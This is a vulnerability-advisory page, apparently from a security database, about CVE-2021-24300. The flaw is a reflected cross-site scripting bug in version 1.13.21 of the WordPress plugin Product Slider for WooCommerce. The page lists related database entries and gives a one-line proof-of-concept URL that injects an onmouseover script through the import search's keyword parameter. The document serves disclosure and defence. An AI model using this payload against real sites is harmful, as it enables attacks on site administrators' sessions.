WordPress Product Slider For WooCommerce 1.13.21 Cross Site Scripting

🗓️ 02 Feb 2022 00:00:00Reported by 0xB9Type

packetstorm🔗 packetstormsecurity.com👁 263 Views

WordPress Product Slider 1.13.21 Cross Site Scriptin

Reporter	Title	Published	Views	Family All 14
0day.today	WordPress Product Slider for WooCommerce 1.13.21 Plugin - Cross Site Scripting Vulnerability	2 Feb 202200:00	–	zdt
CNNVD	WordPress 跨站脚本漏洞	24 May 202100:00	–	cnnvd
CNVD	WordPress PickPlugins Product Slider for WooCommerce Cross-Site Scripting Vulnerability	9 Jul 202100:00	–	cnvd
CVE	CVE-2021-24300	24 May 202110:58	–	cve
Cvelist	CVE-2021-24300 PickPlugins Product Slider for WooCommerce < 1.13.22 - Reflected Cross-Site Scripting (XSS)	24 May 202110:58	–	cvelist
Exploit DB	WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)	2 Feb 202200:00	–	exploitdb
EUVD	EUVD-2021-11214	7 Oct 202500:30	–	euvd
Nuclei	WordPress WooCommerce <1.13.22 - Cross-Site Scripting	7 Jun 202603:02	–	nuclei
NVD	CVE-2021-24300	24 May 202111:15	–	nvd
Patchstack	WordPress Product Slider for WooCommerce plugin <= 1.13.21 - Reflected Cross-Site Scripting (XSS) vulnerability	13 Apr 202100:00	–	patchstack

`# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)  
# Date: 3/16/2021  
# Author: 0xB9  
# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/  
# Version: 1.13.21  
# Tested on: Windows 10  
# CVE: CVE-2021-24300  
  
1. Description:  
This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.  
  
2. Proof of Concept:  
wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//  
  
`

02 Feb 2022 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 24.3

CVSS 3.16.1

EPSS0.03405